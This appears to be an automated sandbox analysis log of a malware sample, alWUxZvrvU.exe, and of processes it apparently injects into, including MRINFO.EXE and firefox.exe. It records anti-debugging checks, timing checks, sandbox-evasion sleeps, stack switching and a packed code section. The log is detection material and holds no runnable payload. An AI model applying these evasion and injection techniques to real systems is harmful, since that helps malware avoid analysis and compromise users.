Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_02995108 push ecx; ret	3_2_02995109
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_02997785 push ebx; retf	3_2_02997786
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_02997CBB push ss; iretd	3_2_02997CBC
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_02999CDB push ebx; ret	3_2_02999CDC
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_031C634A push ecx; retf	3_2_031C6359
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_031CB594 push ecx; retf	3_2_031CB595
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_031C6464 push esi; iretd	3_2_031C6465
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_031C6B37 push eax; ret	3_2_031C6B38
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_031CBAE8 push ds; ret	3_2_031CBAF9
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_031C494F push edi; ret	3_2_031C4951
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_031CF88B push esi; retf	3_2_031CF88C
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_031CCD74 push ecx; ret	3_2_031CCD7F

Source: alWUxZvrvU.exe

Static PE information: section name: .text entropy: 7.995617711588282

Source: C:\Windows\SysWOW64\MRINFO.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\MRINFO.EXE	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\MRINFO.EXE	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\MRINFO.EXE	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\MRINFO.EXE	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\MRINFO.EXE	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\MRINFO.EXE	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\MRINFO.EXE	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\MRINFO.EXE	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Users\user\Desktop\alWUxZvrvU.exe

Code function: 0_2_00EE096E rdtsc

0_2_00EE096E

Source: C:\Windows\SysWOW64\MRINFO.EXE	Window / User API: threadDelayed 3893			Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Window / User API: threadDelayed 6081			Jump to behavior

Source: C:\Users\user\Desktop\alWUxZvrvU.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\MRINFO.EXE	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\MRINFO.EXE TID: 7680	Thread sleep count: 3893 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE TID: 7680	Thread sleep time: -7786000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE TID: 7680	Thread sleep count: 6081 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE TID: 7680	Thread sleep time: -12162000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe TID: 7700	Thread sleep time: -65000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe TID: 7700	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe TID: 7700	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\MRINFO.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\MRINFO.EXE	Last function: Thread delayed

Source: C:\Windows\SysWOW64\MRINFO.EXE

Code function: 3_2_0299C450 FindFirstFileW,FindNextFileW,FindClose,

3_2_0299C450

Source: ZVRmRlsEcS.exe, 00000006.00000002.4157405744.000000000116F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
Source: MRINFO.EXE, 00000003.00000002.4157064198.0000000002EDD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2203366797.000002069319F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\alWUxZvrvU.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\alWUxZvrvU.exe

Code function: 0_2_00EE096E rdtsc

0_2_00EE096E

Source: C:\Users\user\Desktop\alWUxZvrvU.exe

Code function: 0_2_00C876C3 LdrLoadDll,

0_2_00C876C3

Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA80E9 mov eax, dword ptr fs:[00000030h]	0_2_00EA80E9
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9A0E3 mov ecx, dword ptr fs:[00000030h]	0_2_00E9A0E3
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F260E0 mov eax, dword ptr fs:[00000030h]	0_2_00F260E0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9C0F0 mov eax, dword ptr fs:[00000030h]	0_2_00E9C0F0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE20F0 mov ecx, dword ptr fs:[00000030h]	0_2_00EE20F0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F220DE mov eax, dword ptr fs:[00000030h]	0_2_00F220DE
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F660B8 mov eax, dword ptr fs:[00000030h]	0_2_00F660B8
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F660B8 mov ecx, dword ptr fs:[00000030h]	0_2_00F660B8
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F380A8 mov eax, dword ptr fs:[00000030h]	0_2_00F380A8
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA208A mov eax, dword ptr fs:[00000030h]	0_2_00EA208A
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECC073 mov eax, dword ptr fs:[00000030h]	0_2_00ECC073
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F26050 mov eax, dword ptr fs:[00000030h]	0_2_00F26050
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA2050 mov eax, dword ptr fs:[00000030h]	0_2_00EA2050
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F36030 mov eax, dword ptr fs:[00000030h]	0_2_00F36030
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9A020 mov eax, dword ptr fs:[00000030h]	0_2_00E9A020
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9C020 mov eax, dword ptr fs:[00000030h]	0_2_00E9C020
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F24000 mov ecx, dword ptr fs:[00000030h]	0_2_00F24000
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F42000 mov eax, dword ptr fs:[00000030h]	0_2_00F42000
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F42000 mov eax, dword ptr fs:[00000030h]	0_2_00F42000
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F42000 mov eax, dword ptr fs:[00000030h]	0_2_00F42000
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F42000 mov eax, dword ptr fs:[00000030h]	0_2_00F42000
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F42000 mov eax, dword ptr fs:[00000030h]	0_2_00F42000
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F42000 mov eax, dword ptr fs:[00000030h]	0_2_00F42000
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F42000 mov eax, dword ptr fs:[00000030h]	0_2_00F42000
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F42000 mov eax, dword ptr fs:[00000030h]	0_2_00F42000
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EBE016 mov eax, dword ptr fs:[00000030h]	0_2_00EBE016
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EBE016 mov eax, dword ptr fs:[00000030h]	0_2_00EBE016
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EBE016 mov eax, dword ptr fs:[00000030h]	0_2_00EBE016
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EBE016 mov eax, dword ptr fs:[00000030h]	0_2_00EBE016
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F761E5 mov eax, dword ptr fs:[00000030h]	0_2_00F761E5
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED01F8 mov eax, dword ptr fs:[00000030h]	0_2_00ED01F8
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1E1D0 mov eax, dword ptr fs:[00000030h]	0_2_00F1E1D0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1E1D0 mov eax, dword ptr fs:[00000030h]	0_2_00F1E1D0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1E1D0 mov ecx, dword ptr fs:[00000030h]	0_2_00F1E1D0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1E1D0 mov eax, dword ptr fs:[00000030h]	0_2_00F1E1D0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1E1D0 mov eax, dword ptr fs:[00000030h]	0_2_00F1E1D0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F661C3 mov eax, dword ptr fs:[00000030h]	0_2_00F661C3
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F661C3 mov eax, dword ptr fs:[00000030h]	0_2_00F661C3
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE0185 mov eax, dword ptr fs:[00000030h]	0_2_00EE0185
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2019F mov eax, dword ptr fs:[00000030h]	0_2_00F2019F
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2019F mov eax, dword ptr fs:[00000030h]	0_2_00F2019F
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2019F mov eax, dword ptr fs:[00000030h]	0_2_00F2019F
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2019F mov eax, dword ptr fs:[00000030h]	0_2_00F2019F
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F44180 mov eax, dword ptr fs:[00000030h]	0_2_00F44180
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F44180 mov eax, dword ptr fs:[00000030h]	0_2_00F44180
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F5C188 mov eax, dword ptr fs:[00000030h]	0_2_00F5C188
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F5C188 mov eax, dword ptr fs:[00000030h]	0_2_00F5C188
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9A197 mov eax, dword ptr fs:[00000030h]	0_2_00E9A197
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9A197 mov eax, dword ptr fs:[00000030h]	0_2_00E9A197
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9A197 mov eax, dword ptr fs:[00000030h]	0_2_00E9A197
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F38158 mov eax, dword ptr fs:[00000030h]	0_2_00F38158
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F34144 mov eax, dword ptr fs:[00000030h]	0_2_00F34144
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F34144 mov eax, dword ptr fs:[00000030h]	0_2_00F34144
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F34144 mov ecx, dword ptr fs:[00000030h]	0_2_00F34144
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F34144 mov eax, dword ptr fs:[00000030h]	0_2_00F34144
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F34144 mov eax, dword ptr fs:[00000030h]	0_2_00F34144
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA6154 mov eax, dword ptr fs:[00000030h]	0_2_00EA6154
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA6154 mov eax, dword ptr fs:[00000030h]	0_2_00EA6154
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9C156 mov eax, dword ptr fs:[00000030h]	0_2_00E9C156
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED0124 mov eax, dword ptr fs:[00000030h]	0_2_00ED0124
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F60115 mov eax, dword ptr fs:[00000030h]	0_2_00F60115
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4A118 mov ecx, dword ptr fs:[00000030h]	0_2_00F4A118
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4A118 mov eax, dword ptr fs:[00000030h]	0_2_00F4A118
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4A118 mov eax, dword ptr fs:[00000030h]	0_2_00F4A118
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4A118 mov eax, dword ptr fs:[00000030h]	0_2_00F4A118
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4E10E mov eax, dword ptr fs:[00000030h]	0_2_00F4E10E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4E10E mov ecx, dword ptr fs:[00000030h]	0_2_00F4E10E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4E10E mov eax, dword ptr fs:[00000030h]	0_2_00F4E10E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4E10E mov eax, dword ptr fs:[00000030h]	0_2_00F4E10E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4E10E mov ecx, dword ptr fs:[00000030h]	0_2_00F4E10E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4E10E mov eax, dword ptr fs:[00000030h]	0_2_00F4E10E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4E10E mov eax, dword ptr fs:[00000030h]	0_2_00F4E10E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4E10E mov ecx, dword ptr fs:[00000030h]	0_2_00F4E10E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4E10E mov eax, dword ptr fs:[00000030h]	0_2_00F4E10E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4E10E mov ecx, dword ptr fs:[00000030h]	0_2_00F4E10E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB02E1 mov eax, dword ptr fs:[00000030h]	0_2_00EB02E1
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB02E1 mov eax, dword ptr fs:[00000030h]	0_2_00EB02E1
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB02E1 mov eax, dword ptr fs:[00000030h]	0_2_00EB02E1
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAA2C3 mov eax, dword ptr fs:[00000030h]	0_2_00EAA2C3
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAA2C3 mov eax, dword ptr fs:[00000030h]	0_2_00EAA2C3
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAA2C3 mov eax, dword ptr fs:[00000030h]	0_2_00EAA2C3
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAA2C3 mov eax, dword ptr fs:[00000030h]	0_2_00EAA2C3
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAA2C3 mov eax, dword ptr fs:[00000030h]	0_2_00EAA2C3
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB02A0 mov eax, dword ptr fs:[00000030h]	0_2_00EB02A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB02A0 mov eax, dword ptr fs:[00000030h]	0_2_00EB02A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F362A0 mov eax, dword ptr fs:[00000030h]	0_2_00F362A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F362A0 mov ecx, dword ptr fs:[00000030h]	0_2_00F362A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F362A0 mov eax, dword ptr fs:[00000030h]	0_2_00F362A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F362A0 mov eax, dword ptr fs:[00000030h]	0_2_00F362A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F362A0 mov eax, dword ptr fs:[00000030h]	0_2_00F362A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F362A0 mov eax, dword ptr fs:[00000030h]	0_2_00F362A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDE284 mov eax, dword ptr fs:[00000030h]	0_2_00EDE284
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDE284 mov eax, dword ptr fs:[00000030h]	0_2_00EDE284
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F20283 mov eax, dword ptr fs:[00000030h]	0_2_00F20283
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F20283 mov eax, dword ptr fs:[00000030h]	0_2_00F20283
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F20283 mov eax, dword ptr fs:[00000030h]	0_2_00F20283
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]	0_2_00F50274
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]	0_2_00F50274
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]	0_2_00F50274
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]	0_2_00F50274
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]	0_2_00F50274
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]	0_2_00F50274
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]	0_2_00F50274
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]	0_2_00F50274
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]	0_2_00F50274
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]	0_2_00F50274
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]	0_2_00F50274
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]	0_2_00F50274
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9826B mov eax, dword ptr fs:[00000030h]	0_2_00E9826B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA4260 mov eax, dword ptr fs:[00000030h]	0_2_00EA4260
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA4260 mov eax, dword ptr fs:[00000030h]	0_2_00EA4260
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA4260 mov eax, dword ptr fs:[00000030h]	0_2_00EA4260
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F5A250 mov eax, dword ptr fs:[00000030h]	0_2_00F5A250
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F5A250 mov eax, dword ptr fs:[00000030h]	0_2_00F5A250
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F28243 mov eax, dword ptr fs:[00000030h]	0_2_00F28243
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F28243 mov ecx, dword ptr fs:[00000030h]	0_2_00F28243
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA6259 mov eax, dword ptr fs:[00000030h]	0_2_00EA6259
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9A250 mov eax, dword ptr fs:[00000030h]	0_2_00E9A250
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9823B mov eax, dword ptr fs:[00000030h]	0_2_00E9823B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB03E9 mov eax, dword ptr fs:[00000030h]	0_2_00EB03E9
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB03E9 mov eax, dword ptr fs:[00000030h]	0_2_00EB03E9
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB03E9 mov eax, dword ptr fs:[00000030h]	0_2_00EB03E9
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB03E9 mov eax, dword ptr fs:[00000030h]	0_2_00EB03E9
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB03E9 mov eax, dword ptr fs:[00000030h]	0_2_00EB03E9
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB03E9 mov eax, dword ptr fs:[00000030h]	0_2_00EB03E9
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB03E9 mov eax, dword ptr fs:[00000030h]	0_2_00EB03E9
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB03E9 mov eax, dword ptr fs:[00000030h]	0_2_00EB03E9
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED63FF mov eax, dword ptr fs:[00000030h]	0_2_00ED63FF
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EBE3F0 mov eax, dword ptr fs:[00000030h]	0_2_00EBE3F0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EBE3F0 mov eax, dword ptr fs:[00000030h]	0_2_00EBE3F0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EBE3F0 mov eax, dword ptr fs:[00000030h]	0_2_00EBE3F0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F443D4 mov eax, dword ptr fs:[00000030h]	0_2_00F443D4
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F443D4 mov eax, dword ptr fs:[00000030h]	0_2_00F443D4
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAA3C0 mov eax, dword ptr fs:[00000030h]	0_2_00EAA3C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAA3C0 mov eax, dword ptr fs:[00000030h]	0_2_00EAA3C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAA3C0 mov eax, dword ptr fs:[00000030h]	0_2_00EAA3C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAA3C0 mov eax, dword ptr fs:[00000030h]	0_2_00EAA3C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAA3C0 mov eax, dword ptr fs:[00000030h]	0_2_00EAA3C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAA3C0 mov eax, dword ptr fs:[00000030h]	0_2_00EAA3C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA83C0 mov eax, dword ptr fs:[00000030h]	0_2_00EA83C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA83C0 mov eax, dword ptr fs:[00000030h]	0_2_00EA83C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA83C0 mov eax, dword ptr fs:[00000030h]	0_2_00EA83C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA83C0 mov eax, dword ptr fs:[00000030h]	0_2_00EA83C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4E3DB mov eax, dword ptr fs:[00000030h]	0_2_00F4E3DB
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4E3DB mov eax, dword ptr fs:[00000030h]	0_2_00F4E3DB
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4E3DB mov ecx, dword ptr fs:[00000030h]	0_2_00F4E3DB
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4E3DB mov eax, dword ptr fs:[00000030h]	0_2_00F4E3DB
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F263C0 mov eax, dword ptr fs:[00000030h]	0_2_00F263C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F5C3CD mov eax, dword ptr fs:[00000030h]	0_2_00F5C3CD
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9E388 mov eax, dword ptr fs:[00000030h]	0_2_00E9E388
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9E388 mov eax, dword ptr fs:[00000030h]	0_2_00E9E388
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9E388 mov eax, dword ptr fs:[00000030h]	0_2_00E9E388
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC438F mov eax, dword ptr fs:[00000030h]	0_2_00EC438F
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC438F mov eax, dword ptr fs:[00000030h]	0_2_00EC438F
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E98397 mov eax, dword ptr fs:[00000030h]	0_2_00E98397
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E98397 mov eax, dword ptr fs:[00000030h]	0_2_00E98397
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E98397 mov eax, dword ptr fs:[00000030h]	0_2_00E98397
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4437C mov eax, dword ptr fs:[00000030h]	0_2_00F4437C
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6A352 mov eax, dword ptr fs:[00000030h]	0_2_00F6A352
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F48350 mov ecx, dword ptr fs:[00000030h]	0_2_00F48350
